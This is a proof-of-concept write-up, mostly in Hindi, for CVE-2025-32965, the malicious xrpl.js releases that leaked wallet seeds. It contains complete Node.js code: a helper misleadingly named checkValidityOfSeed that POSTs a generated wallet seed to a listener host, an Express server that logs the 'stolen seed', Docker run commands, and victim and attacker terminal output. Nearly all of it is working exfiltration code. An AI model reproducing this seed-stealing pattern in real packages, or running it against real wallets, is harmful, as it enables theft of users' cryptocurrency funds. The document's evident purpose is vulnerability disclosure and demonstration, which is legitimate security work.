
CVE कोड: CVE-2025-32965 भेद्यता प्रकार: Supply Chain Attack (CWE-506: Embedded Malicious Code) लक्ष्य: xrpl.js लाइब्रेरी के 4.2.1–4.2.4 और 2.14.2 संस्करण प्रभाव: उपयोगकर्ता के वॉलेट seed/secret डेटा का हमलावर को भेजा जाना
यह PoC, एक दुर्भावनापूर्ण xrpl.js संस्करण किस प्रकार seed exfiltration (रिसाव) कर सकता है, यह एक पृथक वातावरण में प्रदर्शित करने का उद्देश्य रखता है।
package.json:
{
"name": "xrpl-poc",
"version": "1.0.0",
"main": "test.js",
"dependencies": {
"express": "^4.18.2",
"body-parser": "^1.20.2",
"xrpl": "^2.7.1"
}
}
Dockerfile:
FROM node:20
WORKDIR /app
COPY . .
RUN npm install
CMD [ "node", "test.js" ]
fake_xrpl.js:
async function checkValidityOfSeed(seed) {
const res = await fetch("http://poc-listener:3000/xcm", {
method: "POST",
body: seed,
headers: {
"Content-Type": "text/plain",
"User-Agent": "r3v3r5e-poc"
}
});
console.log(" Seed gönderildi:", seed);
}
module.exports = { checkValidityOfSeed };
test.js:
const xrpl = require("xrpl")
const { checkValidityOfSeed } = require("./fake_xrpl")
const wallet = xrpl.Wallet.generate()
console.log(" Oluşturulan cüzdan:")
console.log("Seed:", wallet.seed)
console.log("Address:", wallet.classicAddress)
checkValidityOfSeed(wallet.seed)
server.js:
const express = require('express')
const bodyParser = require('body-parser')
const app = express()
app.use(bodyParser.text())
app.post("/xcm", (req, res) => {
console.log(" Çalınan SEED =>", req.body)
res.send("OK")
})
app.listen(3000, () => {
console.log(" Listener aktif: http://poc-listener:3000/xcm")
})
docker build -t xrpl-poc .
docker network create xrplnet
docker run -it --rm --network xrplnet --name poc-listener xrpl-poc node server.js
docker run -it --rm --network xrplnet xrpl-poc node test.js
पीड़ित टर्मिनल:
Oluşturulan cüzdan:
Seed: sEd79cMs56cynRVYoXVkk1pn8uYcVqr
Address: rHvx6Xups5uR62QiC31aZeMSMnCFT62fgC
Seed gönderildi: sEd79cMs56cynRVYoXVkk1pn8uYcVqr
हमलावर टर्मिनल:
Listener aktif: http://poc-listener:3000/xcm
Çalınan SEED => sEd79cMs56cynRVYoXVkk1pn8uYcVqr
यह PoC, CVE-2025-32965 भेद्यता का व्यावहारिक रूप से कैसे शोषण किया जा सकता है, यह प्रदर्शित करता है। दुर्भावनापूर्ण xrpl.js लाइब्रेरी का seed exfiltration कोड एक पृथक परीक्षण वातावरण में सफलतापूर्वक चलाया गया और हमलावर सर्वर पर डेटा रिसाव किया गया।
xrpl-poc/
├── Dockerfile
├── package.json
├── test.js
├── fake_xrpl.js
├── server.js
└── README.md
तैयारकर्ता: युसुफ़ दालबुदक
परीक्षण वातावरण: WSL2 + Docker + Node.js v20